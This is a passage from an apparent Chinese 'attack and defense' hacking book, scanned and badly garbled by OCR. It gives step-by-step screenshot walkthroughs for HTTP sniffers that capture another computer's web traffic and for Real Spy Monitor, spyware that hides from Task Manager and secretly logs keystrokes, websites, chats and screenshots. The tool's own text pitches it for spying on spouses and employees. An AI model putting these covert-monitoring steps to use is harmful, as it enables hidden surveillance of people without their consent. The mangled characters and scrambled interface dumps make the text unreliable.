[¥ Show host name rather than IP if possible [Default) 





Content 


二 Some web pages or fles are not your shiffing target. 
名 Check what you need. 


[lw Static web pages [ .html .htm, .xml) 
I¥ Images [ipg., .ipeg. .gif] 


[any other files [cgi, php., jsp, css. zip, etc ] 








Which host is your sniffing target? Any or a specific host. 
淖 te 点 hy hosts no matter their location [Default) 
© Specify a hostIP IE 
Specify the role of the host, client or host? 


~ bs a clent, only shiff HTTP communications requested by the 
[Default] 


个 Asa server, only sniff HTTP communications responded by the host 


Cancel | 





选择 “Sniffer”( 探测 器 ) >“Filter”( 过 滤器 ) 菜 ”设置 缓冲 区 的 大 小 、 启 动 选项 、 探 测 文件 目标 、 探 
单 命令 。 测 的 计算 机 对 象 等 属性 。 


STEP03: 返回 主 界 面 STEP04: ”捕获 目标 计算 机 浏览 网 页 的 信息 


i HttpDetect (EffeTech HTTP Sniffer) - Unregistered Version 


十》 HttpDetect (EffeTech HTTP Sniffer) - Unregistered Ve -一 一 一 一 一 一 
上 bp | 总 入 | 六 | 目 | 必 8 各 
Fle View Sniffer Help No [Time [chemanpORD) [seveippom [ur pet 
子 一 2.168.1.10 : xbox.: ame.360... /api/getversion?uuid=1393: 二 
| 分 左 | 六 | 辐 | 和 时 | 和 92 1681 10 7774 EE te EE 
Ne. | Time “| Client(P:PORD) Server(IP:PORT) 








Feb 26... 192.168.1.10:7225 www.crsky.com :80 /soft/2305.html 
Feb 26... 192.168.1.10:7225 www.crsky.com :80 /theme/crsky 2009.css 
Feb 26... 192.168.1.10:7227 cbjs.baidu.com :80 jjs/mjs 


maoowm 上 wm ~ 























Feb 26..，192.168.1.10 :7228 www.crsky.com :80 /theme/jquery-1.3.2.min,s 

Feb 26... 192.168.1.10:7229 www.crsky.com :80 /theme/jQselects 

Feb 26... 192.168.1.10:7230 www.crsky.com :80 /theme/jquery.cookie.js 

Feb 26... 192.168.1.10:7231 www.crsky.com :80 /js/jquery.autocomplete,s 

Feb 26... 192.168.1.10:7232 www.crsky.com :80 /theme/global,s 

Feb 26... 192.168.1.10:7225 www.crsky.com :80 /theme/js_soft.js 

Feb 26... 192.168.1.10:7234 vd.cnzz.com :80 /stat.php?id=915948&web id=91594 

Feb 26... 192.168.1.10:7235 v8.cnzz.com :80 /stat.php?id=300636&web_id=30... 

Feb 26... 192.168.1.10:7233 dx.crsky.com :80 jis/softjs2t= 

Feb 26..， 192.168,1.10 ;7230 www.crsky.com ;80 /theme/script,s 

Feb 26..，192.168.1.10 :7228 www.crsky.com :80 /js/comment,s 

Feb 26... 192.168.1.10:7229 www.crsky.com :80 /tjs/count/2305.s 

Feb 26... 192.168.1.10:7236 pstatic.xunlei.com :... /js/webThunderDetect,s 

Feh ?A 197 1AR 1 1N .7237 rmint rrstv ram "Rn /tnnls<Amrwnrront ashy?id=23N5 
HTTP Request Header 
GET /api/getversion?uuid=1393381076x1igtihnestamp=1393381076 a . 
£3sign=42db6fa4d836de278910e03bp097bc2349 TP/1.1 
User-Agent: Mozilla/4.0 {compatibie; MS 人 EE 7.0; Windows NT 6.0; | 2 
Trident/4.0; .NET CLR 2.0.50727; Media dencez PC 5.0; .NET CLR | 
3.0.04506; .NET CLR 3.5.21022) ; 
Host: xbox.360game.360.cn 
Cache-Control: no-cache 二 S21s 
Ready Buffer:10% |URLs:172 |Packets: 96: 才 


单 击 工具 栏 上 的 “开始 ”按钮 | 。 查看 捕获 到 的 信息 。 











ss 
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STEP05: 打开 主 界 面 
i HitpDetect (EffeTech HTTP Smiffer) - Unregistered Ve 


File View er ee 


vv EE 


-Ee save the file 
Copy URL 
Copy line 





192.168.1.10 :7231 
192.168.1.10 :7232 
192168.L10 :1225 
192.168.1.10 :7234 


选中 需要 查看 的 捕获 记 选择 “Sniffer” 
录 ， 则 可 查看 其 HTTP 请 求 。“( 探测 器 )> “View 
命令 和 应 答 信息 。 details 查 看 详情 命 

令 有 菜单 命 op 令 O 
STEP07: 查看 HTTP 请 求 头 


192.168.1.10 :8055 123.129.242.179 :80 
192.168.1.10 :8055 123.129.242.179 :80 
192.168.1.10 :8058 58.254.134.218 :80 
192.168.1.10 :8057 ”58.254.134.137 :80 


www.crsky.com 
www.crsky.com 
Www.crsky.com 
V4,cnzz.com :80 


: Mozilla/5S.0 (Windows NT 6.1) ZAppl 
Gecko) Chrome/21.0.1180.8939 Safar 


查看 捕获 到 的 软件 下 载 地 址 , 将 该 地 址 直接 添加 到 
FlashGet 等 下 载 工 具 的 网 址 栏 中 , 即 可 下 载 相应 程 
序 。 





在 使 用 艾 菲 网 页 侦探 捕获 下 载 地 址 时 ， 不 仅 可 以 捕获 到 其 


其 真实 的 下 载 地 址 。 








信息 /CA 的 扫 搞 与 隅 探 木 


STEP06: ”HTTP 通信 详细 资料 


HTTP Communications Detalil 


Detail |Content | Text View | Packets | Commands | 





Ho. 2 Feb 26, Whether finished: Yes 


—General Information 
TimeStamp: 


Client -> Server: 192.168.1.10:7225 -> 111.206.34.186:80 


Packets List 


TOE segum | TOF som | Eom | Dota Lon 
2451707139 216372070 
216372070 2451707629 
216372412 2451707629 
216373852 2451707629 
216375292 。 2451707629 
216377937 。 2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 

2451707629 


10:18:08. 38... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50. . . 
10:18:08. 50... 
10:;18:08..30,. 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 
10:18:08. 50... 


216376497 
216379397 
216377957 
216380857 
216379417 
216382317 
216380877 
216383777 
216382337 
216383797 
216385237 
216386697 
216385257 
216388157 
216386717 
216389617 
216388177 


(一目 一 丰 一 丰 一 避 一 丰 一 和 一 丰 一 丰 一 丰 一 丰 一 丰 一 丰 一 丰 一 各 一 丰 一 各 一 丰 一 丰 一 各 一 各 一 | 


查看 所 选 记录 的 详细 信息 。 


STEP08: 保存 文件 


i HttpDetect (EffeTech HTTP Sniffer) - Unregistered Versia 


| 关 | 目 | 必 了 | 全 


一 二 一 Client(IP:PORT) Server(IP:PORT) 


192.168.1.10 :7220 xbox.360game.360, 
192.168.1.10 :7224 ”5360.cn :80 
192.168.1.10 :7225 www.crsky.com :80 
192.168.1.10 :7225 www.crsky.com : 
192.168.1.10 :7227 chbjs.baidu.com.: 
192.168.1.10 :7228 www.crsky.com ; 
192.168.1.10 :7229 ”www.crsley.com : 
192.168.1.10 :7230 www.crsky.com : 
192.168.1.10 :7231 


0 
3 
2 
3 
是 
3 
6 
了 
8 


www.crsky.com ; 


选中 需要 保存 的 记录 ， 单 击 “ 保存 来 自选 定 链接 
so 按钮 如, 可 将 所 选 记录 保存 到 磁盘 中 , 可 
通过 记事 本 ”程序 打开 该 文件 ， 浏 览 其 中 的 详细 


信息 NG 


[引用 页 地 址 ， 还 可 以 捕获 到 


2.3.4 使 用 影音 神探 嗅 探 在 线 视 频 地 址 
使 用 影片 别 探 大 师 “ 影 音 神探 ”可 轻松 找到 电影 的 下 载 地 址 ， 它 使 用 WinPcap23 开发 





包 ， 咒 探 流 过 网 卡 的 数据 并 进行 智能 分 析 ， 可 监视 20 余 


5 


种 网 络 文 件 ， 还 可 目 行 定义 ， 可 通 


> 





攻防 从 入 门 到 精通 


过 目 定 义 类 型 扩充 噢 探 功 能 ， 双 击 找到 的 文件 即 可 目 动 月 动 事先 设置 好 的 下 载 工具 ; 奏 看 
远程 卫 连接 ， 获 知 IP 协议 ， 下 载 准 确 快 捷 ， 弹 出 广告 屏 巩 模 世 可 让 用 户 上 网 不 再 受 弹出 














人 
设置 和 使 用 影音 神探 的 具体 操作 步骤 如 下 。 
STEP01: 启动 影音 神探 STEP02: 安装 WINPCAP 


命 WinPcap 4.1 betap Setup 
\\ 和 WinPcap 4.1 beta5 Installer 
1 “ap Welcome to the Winpcap 4.1 beta5 Installation Wizard 
@ 注意 请 先 实 装 winPcap 后 再 局 动 程序 。 


按 "oRo 后 开始 安装 winPcap This product is brought to You by 


三 
CACE 


TECHNOLOGIES 


Packet Capturing and Network Analysis Solutions 


Cancel 





弹出 “Error” 提示 框 ， 提 示 “ 请 安装 WinPcap 后 再 ”一 直 单 击 “Next” 按钮 , 将 开始 安装 WinPcap， 待 


启动 程序 ”信息 ， 单 击 “OK” 按 钮 。 安装 成 功 后 单 击 "Finish” 按钮 ， 即 完成 WINPCAP 
安装 。 
STEP03: 查看 提示 信息 STEP04: 打开 “设置 ”对 话 框 


Information 





常规 设置 | 网 络 适 配器 
网 结 适 配 名 称 

口 Adapter for generic dialup and..， DeviceWPF_Ge..， 正在 误 试 
器 Realtek 10M00M000 Ethernet ... ‘DeviceWPF_i{C... 











I 试 网 站 : baidu.com 











提示 “程序 将 会 测试 所 有 网 络 适配器 ”信息 , 单 击 ”测试 网 络 配置 是 否 可 用 。 
“OK” 按 钮 。 
STEP05: 查看 提示 信息 STEP06: 返回 “设置 ”对 话 框 


Information 





| 网 络 适 配 名 称 | 状态 | 
中 “dapter for generic dialup and... ‘Device'NPF_Ge... 不 可 用 
Realtek 10M O00MO00 Ethernet ... 让 evicePF 1 可 用 








baidu.com 训 试 所 有 网 络 适配器 





Cancel | 





如 果 本 机 的 网 络 适配器 符合 测试 要 求 , 即 可 看 到 该 ” 国 看 到 可 用 的 网 络 ” 辆 单 击 “确定 "按钮, 即 完 
提示 信息 ， 单 击 “OK” 按 钮 。 适配器 已 经 被 选中 。 ”成 对 网 络 适配器 的 设置 。 


60 


STEP07: 


返回 “影音 神探 ” 主 窗 


妃 第 2 章 
信息 /CE 的 扫 摘 与 嘿 探 


STEP08: 开始 噢 探 





| 网 络 噢 探 加 (影音 神探 )V5.5 sh 
陋 探 C】 列表 (设置 (QO) 和 助 (HD 
一 会 ~ 
Ny ES 上 上 
em8 控 | 停止 唤 探 ”设置 | 景 小 化 | 退出 
[ER 地 让 | 所 有 站 型 文件 ] EE 
状态 停止 唤 索 当前 工作 模式 臣 取 URU] 所 8 藉 拓 吕 影 着 神 岳 ) 守 方 同 丰 WwW .witq com 














选择 “ 嗅 探 ” >“ 开始 嗅 探 ” 菜 单 命 令 或 单 击 工具 
的 “开始 嗅 探 ”按钮 号 。 


STEP09: 新 建 任务 


地 址 : .tp:Arp2.v iask. com/T75/515/1153485_1. jp 由 选择 BT 种 子 


保存 至 : iC: DowmlLoads 


亲人 忻 各: |1153485 1. jpg 


更 多 选项 >y ] | 保存 为 默 证 | 


国 设置 保存 路 径 与 文件 名 ， 
并 将 刚 复 制 的 地 址 粘贴 到 
“地 址 ”文本 框 中 。 


© 


提示 


加 单 击 “确定 ” 按 
钮 。 





如 果 选 择 “ 影 音 传 送 带 下 载 ” 选 
音 传 送 带 ”或 “网 际 快 车 ”软件 ， 才 能 使 用 软件 中 对 应 的 操作 方法 。 





这 

网 络 吕 控 圳 ( 裳 音 神探 )V5.5 jj 

晚 探 CO 列表 (D， 设置 (QO) 帮助 (由 | 

mm 会 a 
| 时 
停止 嗅 达 | 设置 最 小 化 退出 

| 文件 类 型 | 数据 包 廊 内 | 地 址 [所 有 类型 次 件 ] | 备注 EE 
文本 文件 本 机 一 一 网 络 http: therww .wbtd.comisdmaxs htm 

文本 文件 本 机 一 一 同 络 http: enna 100fenim.cnis/iengrne jsp?divid=Im100fen2228rid=2228wid=19141&ww=08h=0&styp... 

文本 文件 本 机 一 一 网 结 http:/es3.cnzz.com/siat htm?id=1074095&r=3 妈 =zh-cnantime=0 99933300%2012774455778&rep... 

图 片 文件 本 机 一 一 同 综 Http: wbtdcomjsdmaxs gif 

图 片 文件 本 机 一 一 网 络 http: Hist.video baidu comfNvideoindexstaticfi_imgyarrovy 

图 片 文件 本 机 一 一 同 络 http: /hsclick baicu .comih gif?pid=1048v=video-index8Sr= Er xp=_teb-4_8ckjuri=non... 

文本 文件 本 机 一 一 网 络 hitp: viceo .sina.com.cnivib/34620116-1579974291 html 

图 片 文件 网 络 一 一 本 机 http: to4 .vjsskcomjB1774)34620116_1j 

图 片 文件 本 机 一 一 网 络 http: 人 1 .baidu_comvt=716353479,16916740268&fm=08gp=0jpg 

图 片 文件 本 机 一 一 同 结 http: 人 M1 .baidu.comiitAi=3581534026,2879458588&fm=48gp=0 和 pg 

文本 文件 网 络 一 一 本 机 http: /fsearch video .sina.com.cnisear ch php 

图 片 文件 本 机 一 一 网 络 http: #2 baldu cormuiu=1141725060,4039153844&fm=02gp=0jpg 

文本 文件 网 络 一 一 本 机 http: /fsearch video sina.com.cnisearch Php3?kn95E5%B89%83C%E5%B0%949%5E996A196BF9%E9%S..， 

文本 立 件 网 络 一 一 本 机 http'Jsearch video sina com cnsearch php7k=5%kE6%B65%6956E9%BB%6datypPe=al 

图 片 艾 件 本 机 一 一 同 络 http: 从 3.baidu.corrutA=1659040260,2178582359&fm=63gp=0jpg 

图 片 文件 本 机 一 一 网 络 http: 全 2.baldu comitiu=2775377659,1460690742&tm=6&gp=0 pg 

图 片 文 件 本 机 一 一 网 络 http:/#2.baidu .comitl=1457200017,3840481463&fm=7&gp=0jpg 

图 片 文件 本 机 一 一 同 络 http: 人 3.baidu_corvyitu=1515048608,42094602728&fm=63gp=0jpg 

图 片 文件 本 机 一 一 网络 http: 人 kt2.baidu_.corvit=3770743946,24161590928fm=62gp=0jpg 

图 片 文件 本 机 一 一 网 络 http:ik1 baidu com i=3138057842,308003313&fm=7&gp=0 jpg 

图 片 文件 本 机 一 一 网 党 tp' 人 1 .baidu.corvtA=2718390101,4105112946&fm=63gp=0jpg 

图 片 文件 本 机 一 一 同 续 http: 从 1 baicdu .comtAs=2457610071,2611134660&fm=68gp=0 jpgq 

图 片 交 件 本 机 一 一 同 结 http: 人 1 baidu comit k=4019335439,.417837417621m=529p=0 pg 

文本 文件 一 一 本 机 http: /fviceo .sina.com.cnipinewsiciy/2010-05-26M 91561015699.html?rec=4 

文本 文件 网 结 一 一 本 机 http: /fviceo.sina.com,.cnypinewsiciy/2010-05-240082661013869.html?rec=4 

文本 文件 网 络 一 一 本 机 http:ihiceo.sina.com.cniplaylisti59050-1219126120-1 himl?rec=4 

图 片 交 件 网 络 一 一 本 机 vpi/vpic3 sinaimng com cninaibaj63050 gif 
状态 : 开始 嗅 探 当前 工作 巾 式 [ 获 职 URLI 网 络 昨 探 器 (影音 神探 ) 官 方 网 站 www wtyxtq com 








查看 嗅 探 到 的 信息 。 


在 “文件 类 型 ”列表 中 右 击 要 下 载 的 文件 ， 从 
快捷 菜单 中 选择 “复制 地 址 ” 命令 ， 即 可 复制 选 
中 文件 的 下 载 地 址 。 


名 选择 “列表 ”>“ 用 网 际 快车 下 载 " 菜单 命令 。 
STEP10: 用 网 际 快车 下 载 


一 


撞 选项 


国 迷你 快车 FlashGet-mim 


EE 


3435 1, jpg 
2010-6-25 15 "Lownloads 


速度 :40K/s +OK/s 


开始 下 载 ， 下 载 完 成 后 可 在 “文件 名 ”后 
个 对 色 。 


后 面 看 到 一 


项 或 者 “网 际 快 车 ”选项 ,， 则 先 要 安 又 “ 影 








攻防 从 入 门 到 精通 





STEP11: 返回 “影音 神探 ” 主 窗口 STEP12: “自动 开启 响 探 ”等 设置 





[网络 噢 探 加 (影音 神探 V54 
[TEST 和 FT 








[| 地址 所 UX IE | 








自动 开启 嗅 探 


允许 列举 未 定 兴 文件 类 型 


允许 列举 重复 的 URL 


网 际 快车 主 程序 位 置 ”加 网 际 块 车 | .… | 





停止 嗅 控 | 当前 工作 模式 [ 获 职 URL] 网 络 唤 探 器 (影音 神探 ) 官 方 网 站 www.wixtq com 


单 击 “ 设 置 ”> “综合 设置 ”菜单 命令 。 根据 需要 在 “常规 设置 选项 卡 中 勾 选 相应 复 选 框 。 











STEP13: 切换 至 “文件 类 型 ”选项 卡 STEP14: 给 噢 探 的 数据 包 添 加 备注 信息 














一 
网 络 嗅 探 器 (影音 神探 )V5.5 






| 时 
开始 珊 探 | 停止 唤 探 设置 | 最 小 化 | 退出 
| 数据 包 方向 | 

























可 | 视频 六 
回音 频 文 件 
由 - 回 图 片 文件 
二 - 回 文本 文件 
9 回 自 定义 类 型 




































停止 噢 探 当前 工作 模式 { 获 职 URL] 网 络 噢 琛 器 (影音 神探 ) 官 方 网 站 www.wixtq.com 


设置 要 下 载 文件 的 类 型 ， 这 里 义 选 所 有 的 复 选 框 。 选择 “列表 ”>“ 增 加 备注 ”菜单 命令 。 


STEP15: 编辑 备注 STEP16: 返回 “影音 神探 ” 主 窗口 









| 网 络 噢 探 器 (影音 神探 )V5.5 
了 昨 探 (C) 列表 (LD) 设置 (0) 帮助 ID 


多 仿 | 全 | 外 | 久 




















图 片 文件 本 机 一 一 网 络 http://simg0 .sinajs .cnvideo/images/icommoniclose gif 
文本 文件 本 机 一 一 网 络 http: 川 You video .sina.com.cniappicountigetFlashCount php?vid=hotvid_hot_len_0-34451739xhat... 
一 壬 2 口 有 需要 梨 存 的 好 | 表 才 图 片 文件 本 机 一 一 网 络 Ny gif?pid=1048s=28u=http: /iy ku6 .comishow/Ha-RXPPa9QPIPSGI html& word=%c2%ed%c1 Wd5... 
[A "™ 六 本 文件 本 机 一 一 网 络 http:iizs3.cnzz .comistat htm?id=10740958r=8lg=zh-cn&ntime=0.99933300%201277445577&rep... 
] 交 本 文件 本 机 一 一 网 络 http: /kz zagame .comikzimfindex html?ad=i9sr5xnr_4d362C54362C6b%2C78%2C4e3%2C443%62C45.. 
ConAremohecheoc el dode eepx?0 .7897698271275049 













Ht Wn or 0 








文本 文件 本 机 一 一 网 络 http: /zs3.cnzz .com/stat htm?id=10740958r=8lg=zh-cn&ntime=0.74983100%2012774509818&rep... 
文本 文件 网 络 一 一 本 机 http: /hd.zqygame .com/activitiesAdimB/index htmi?ac=td142_4d%2C54%2C6b%2 
文本 文件 本 机 一 一 网 络 http:Mtd.zqdgame com/activitiesAdimG/index htmi?ad=td142_4d%2C54%2CBh%2C78%2C4e%2C44... 
次 本 文件 网 络 一 一 本 机 http:itd.zqygame .comimainfistpage aspx 
文本 文件 网 络 一 一 本 机 http: /td.zqygame .comixsznifindex html 
六 本 文件 网 络 一 一 本 机 http:/td.zqygame .com/yxzlinfor html 
文本 文件 网 络 一 一 本 机 http: /td.zqgame .comjdownloadjxzzq html 

件 本 机 一 一 网 络 http:/Ad.zqygame .comiactivitiesAdimE /magesibg pg 
图 片 文件 本 机 一 一 网 络 http:itd.zqyame .comiactivitiesAdimB /imadesd pg 
图 片 文件 本 机 一 一 网 络 http: /td.zqgame .comipasspol JPG 
图 片 文件 本 机 一 一 网 络 http:itd.zqygame .comiactivitie 

件 本 机 一 一 网 络 http:/td .zgame.c: ode aspx?0.03424670807090957 
六 本 文件 本 机 一 一 网 络 http:jtd .zaqgame .comiactivitiesAcdimBindex htmi?ad=td142_4d%2C54962C6b%2C78%2C4e9%62C44 
文本 文件 本 机 一 一 网 络 http:/td.zqyame .comAdoreg/checkcode/Code aspx7?07536875602677111 
六 本 文件 本 机 一 一 网 络 http:yvideo sina .com_cnjapiilajax html 
图 片 文件 本 机 一 一 网 络 gif?pid=1048s=28u=http: /iy ku6 comjshowyHa-RXPPa9GPiP5GIhtmlSword=%c236ed56c196d5， 
六 本 文件 本 机 一 一 网 络 http:/fzs3.cnzz .comistat htm?id=10740958r=8lg=zh-cn&ntime=0.74983100%2012774509818&rep... 
图 片 文件 本 机 一 一 网 络 hy .gif?pid=1048s=28u=http: /video.sina.com cnvh/34620116-1579974291 htmigword=%c1%t5... 

开始 嗅 探 当前 工作 模式 [获取 URL] 网 络 嗅 探 器 (影音 神探 ) 官 方 网 站 www wlxiq com 




















输入 备注 的 名 称 。 单 击 “QK ”还 裔 as 在 “备注 ” 栏 中 看 到 添加 的 备注 。 
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< 第 2 章 
言 息 的 扫描 与 限 探 


STEP17: 分 类 显示 嗅 探 出 的 数据 包 


同 络 嗅 探 器 (影音 神探 )V5.5 
隐 探 (GO 列表 (LD 设置 (0) 才 助 (中 ) 
过 SY Ls> 车 


I 停止 嗅 探 ” 设置 最 小 化 退 出 
| 数据 包 方 向 | 地 _ 址 [图片 文件 ] 
本 机 一 一 网 络 pitp:/ic chinaih comicode_img/920x90 gif 
本 机 一 一 网 络 httpJsimng0 sinajs .cnivideofmagesicommon/co._transparent gif 
本 机 一 一 网 络 http: 0.sinaimg cnidy/2010/0523/2010523164344 jpg 








全 站 长 统计 











在 “数据 包 ” 列 表 中 右 击 ,在 快捷 菜单 中 选择 

类 查看 ”>“ 图 片 文件 "命令 ， 即 可 显示 图 片 形 式 的 
数据 包 ; 选择 “分 类 查看 ”> "文本 文件 ”命令 , 即 
可 显示 文本 文件 形式 的 数据 包 。 


本 机 一 一 网 络 http: -2.dgua123.c comujimg14_4862139 .gif 
本 机 一 一 网 络 ittp. /ermemm baidu,cornfisfmg/close gif 





age: | 
本 机 一 一 网 络 htp /sjs0 sinajs cnVideolmages/common/downtip git 
本 机 一 一 同 络 http'Wbeacon sina.com.cnia .gif?Y=28Cl=sz:1400x900lclp:16lac:MozilalarMSIElcpu-x86lpfyyin32jv:1.3Ictlanllg zh-cnitz:-. 
本 机 一 一 网 络 http: /tsina. wrating .com/a gif ?a=1 ra 8t=8i=417a24003.1296e02b721 .0.0d4954cd1e29d48b=http%63AiNideo.sin.. 
本 机 一 一 网 络 hittp: /Nideo sina com.cniyinjian/2010y02 mew gif 
本 机 一 一 网 络 pttp /3.sinaimg cnybloghframmejB720071 022U2201 P478T9D78F190DT20100625100251 jpg 











本 机 一 一 网 络 pedkz omikzimimages/footerlogo gif 
httpJpl,v eek .como/2M175208. 1 pg 
状态 : 开始 嗅 探 当前 工作 模式 [获取 URL] 网 络 咱 探 器 (影音 神探 ) 官 方 网 站 www wtxtq com 











STEP18: 返回 “影音 神探 ” 主 窗 口 STEP19: 保存 文件 











| 网 络 噢 探 加 (影音 神探 V5.5 








I 


Lar 
最 小 化 | 退出 








E 软件 广 明 

















File type: 六 本 辫 件 [*txt) 








网 络 啸 探 器 (影音 神探 官方 网 站 www.wxiq com 


















单 击 “ 列 表 ”>“ 保 存 列表 ”菜单 命令 。 选择 保存 位 置 ， 然 后 单 击 “Save” 按 钮 。 
STEP20: 选择 保存 文件 方式 STEP21: 保存 完毕 


Information Information 


选择 文件 保存 方式 








文件 保存 完毕 。 





具 实 现 网 络 监控 


Real Spy Monitor 是 一 个 监测 互联 网 和 个 人 计算 机 ， 以 保障 其 安全 的 软件 。 键 盘 襄 击 、 
Bi 视窗 开关 、 程 序 执行 、 屏 人 幕 扫描 以 及 文件 的 出 入 等 都 是 其 监控 的 对 象 。 
添加 使 用 密码 
使 用 Real Spy Monitor 对 系统 进行 监控 乙 前 ， 要 进行 一 些 设置 ， 具 体 的 操作 步骤 如 下 。 


GO 











又 天 一 1 > 





攻防 从 入 门 到 精通 





STEP01: 局 动 “Real Spy Monitor” STEP02: 输入 窗 码 


Real Spy Monitor is a Powerful spy-monitoring-security tool, DIdPassweord- 


Worried about how your PC is being used? Want to keep tabs on [| 
your children,spouse,employees? Need to Prevent your children 

of employee from some application or websites? Real Spy Monitor 
is the full solution for you. 


New Passyord: 


This window will be displayed upon every run of Real Spy Monitor. 

Al monitoring intervals during this trial period will terminate after 20 
minutes. This window is eliminated by purchaseing the full version. > 
Conmfirm: 


Click on the Ordering Information button to know how to purchase 
this product. 























打开 “注册 ”页 面 ， 阅 读 注册 信息 后 ， 单 击 第 一 次 使 用 ， 没 有 旧 密 码 可 更 国 单 击 


“Continue ”按钮 。 改 , 只 需 在 “New PassWord” 和 “OK” 技 
“Confirm" 文本 框 中 输入 相同 的 密 钮 。 
位 。 


在 “SetPassWord” 对 话 框 中 所 填写 的 新 密码 ， 将 会 在 Real Spy Monitor 的 
使 用 中 经 第 使 用 ， 所 以 要 牢记 此 密码 。 





2. 设置 弹出 热 键 

之 所 以 需要 设置 弹出 热 键 , 是 因为 Real Spy Monitor 运行 时 会 较 彻 底 地 将 自己 隐藏 ， 
用 户 甚 至 在 “任务 管理 器 ”中 也 看 不 到 该 程序 的 运行 。 要 将 运行 时 的 Real Spy Monitor 
调 出 就 要 使 用 热 键 ， 单 击 “ 开 始 ” 菜 单 中 的 “Real Spy Monitor” 命 令 也 不 奏效 。 

设置 热 键 的 具体 操作 步骤 如 下 。 


STEP01: 返回 “Real Spy Monitor” 主 窗口 STEP02: 设置 热 键 











A Real Spy Monitor Bulid 2.93 
如- Powerful PC Spy-Monitoring-Securiky Software Monitoring Status: Not Actve 


Options PC Activity Internet Buttons Domeral Sot 总 HotKey Configuration: 
General Setting ] MSIE M 


Keystrokes Typed > 
Startup Settings 国 0 Keystrokes Logged 四 办 0 Conversations (start Monitor) Logging Record Select your hotkey patten: 


Logging Recorded t Websites Visited ICQ Messenger SEOT Monitor’) Email Delivery 
Configure logging options 0 Websites Logged 0 Conversations 


Cou) 
( Messenger 


Email \ FTP Delivery Windows Viewed 入 AOL Messenger Snapshots Spy 
0 Conversations 


Set Email \ FTP Delivery 0 Windows Logged 


: Hotkey Choice 
卉 | Screen Spy 7 Programs Executed Yahoo! Messenger 
| Record snapshots actvity 0 Application Logged 0 Conversations 


fa Hotkey Choice - Screen Snapshots Csame™) 
Set your own hotkey 0 Snapshots Logged DN 


人 Register FTP Delivery 
Content Filtering Files\Docs Accessed 


4 Fiter User's Activitys 0 Fles Logged YaxHoO! Mall x CC Hp 


Content Filtering 


c 和 
| a 

PC Activity 】 
§ a 
WebMail 
~ Setting 
| Register 3 








@ 2010 Designed By ShareStar Inc， 


单 击 “Hotkey Choice” 图 标 。 在 “Select your hotkey patten” 下 拉 列 表 框 中 选 
择 所 需 热 键 ( 也 可 自 定 义 ) 。 


EL 


< 第 2 章 





STEPO1: 


Dy OE 


监控 浏览 过 的 网 站 








信息 /EC 的 扫 搞 与 隅 探 木 


0 的 设置 后 , 就 可 以 使 用 Real Spy Monitor 进行 系统 监控 了 。 下 面 讲述 Real 
Spy Monitor 如 何 对 一 些 最 向 使 用 的 程序 进行 


单 击 “Start Monitor” 按钮 





A Real Spy Monitor Bulid 2.9 
Powerful PC co Monitoring-Security Software Monitoring Status: Not Actve 


丁 监控。 监控 浏览 过 


STEP02: 查看 注意 信息 





网 站 的 只 体 操作 步 又 如 下 。 


Optiors PC Activity Internet Buttons 
neral i | 中 
ee | Pet CD stealth Mode Notice: 








Stop Monitory 
pc activity 
¢ Messenger 


民 Logging Recorded ER 
Configure logging options 0 


Email \ FTP Delivery 
Set Email \ FTP Delivery 0 











Real Spy Monitor is now going to be in 
steakkh mode.To bring Real SpY Monitor 
out of steal mode,press Ctrl+Att+5 on 


YOUT keyboard. 





卉 | Screen Spy 了 7 
Record snapshots activity 0 Application Logged 


0 Conversations 


有 i pe Sening Do not show me this message again. 
Set your own hotkey 0 Snapshots Logged ~ Register 人 
Ri | 人 | DOLMal | Eap 








@ 2010 Designed By ShareStar Inc. 





弹出 对 话 框 ， 输 入 正确 的 密码 ， 单 击 “OK” 按钮 。 
STEP03: 使 用 IE 浏览 器 浏览 网 站 


口 - 一 一 一 一 一 一 志 夸 = 夏 - 
AL Real Spy Monitor Bulid 2.93 
Powerful PC Spy-Monitoring-Security Software Monitoring Status: Not Active 


在 认真 阅读 注意 信息 后 ， 单 击 “OK” 按 钮 。 





Options PC Activity Internet Buttons 按 < Ctrl+AIt+R > 组 合 键 ， 在 “密码 输入 ” 
人 咽 22 和 Ee Cstart Monitor) 


对 话 框 中 输入 所 设置 的 密码 ， 才 能 调 出 “ Real 
Spy Monitor” 主 窗口 ,可 以 发 现 其 中 "Websites 
Visited” 项 下 已 有 了 计数 。 
此 处 计数 为 37， 表 示 共 打开 了 37 个 网 页 ， 选择 
“Websites Visited” 选 项 。 


Logging Recorded 办 Websites Visited -ID ICQ Messenger Stop Monito 
Configure logging options 37Websites Logged BY 0 Conversations 


Email \ FTP Windows Viewed AOLM 
Messenger 


Set Email \ FTP Delvery 54 Windows Logged 0 Conversations 
) Yahoo! Messenger 《 Web Mail 
” 0 Conversations 


击 Screen Spy - 
Record snapshots actvity 


Hotkey Choice 
Set your own hotkey 


Programs Executed 
24 Application Logged 


Screen Snapshots 
11 Snapshots Logged 


Content Filtering 
Fiker User's Activitys 


Files\Docs Accessed 
25 Files Logged 


YaHoo! Maili¢ He 
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STEP04: 打开 “Report” 窗 口 
‘© Report ee 


Select what ou want to view: 
局 蕉 总 车 轧 “— 

ss ‘Websit PR su pops 

1 ern .JH 2 ,LO x.h,,. | http:s rrarw. 二 JU Ur 

http: fw bau conbad re., ht: ww baidu,c,,. 


EF EE Intemet URL 

百度 一 下 ， 你 就 知道 - Microsoft Int.,， http:j fvwww,baidy,c,,, Adminis,,, 2009-6-12 9:01:04 
百度 搜索 _| 新 浪 - ee Internet,.. 全 liwwwbaidy.c,,. adminis,,， 2009-6-12 9:01:24 
新 浪 首页 - Microsoft Internet Explorer http: 放 www,sina,co,,， Adminis,,, 2009-6-12 9:01:43 
明星 全 接 和 _ 影 音 娱 乐 _ 新 浪 网 - Micr.,， http;ffent.sina,.com,,,， Adminis,,， 2009-6-12 9:02:01 
张 涵 子 苏有朋 抵 汕 人口 贩 卖 为 动画 考 ..，http;j /ent.sina.com..,,， Adminis..， 2009-6-12 9:03:12 
明星 全 接 训 影音 娱乐 _ 新 浪 网 - Micr,,， http;jfent,sina,com,,,， adminis,,， 2009-6-12 9:03;21 

















